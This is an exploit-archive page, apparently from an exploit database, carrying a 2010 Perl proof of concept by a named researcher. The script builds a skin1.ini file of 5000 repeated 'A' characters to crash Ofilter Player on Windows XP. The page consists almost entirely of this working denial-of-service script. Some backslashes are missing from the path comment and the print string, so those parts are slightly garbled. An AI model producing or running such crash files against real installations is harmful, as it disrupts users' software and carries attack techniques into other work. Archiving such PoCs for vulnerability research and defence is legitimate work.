[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ofilter Player (skin.ini) Local Crash PoC
# Published : 2010-01-13
# Author : Rehan Ahmed
# Previous Title : SwiFTP v1.11 Overflow Dos PoC
# Next Title : Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
my $boom="x41" x 5000;
my $file="skin1.ini"; #C:Program FilesOfilterPlayerskin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Createdn";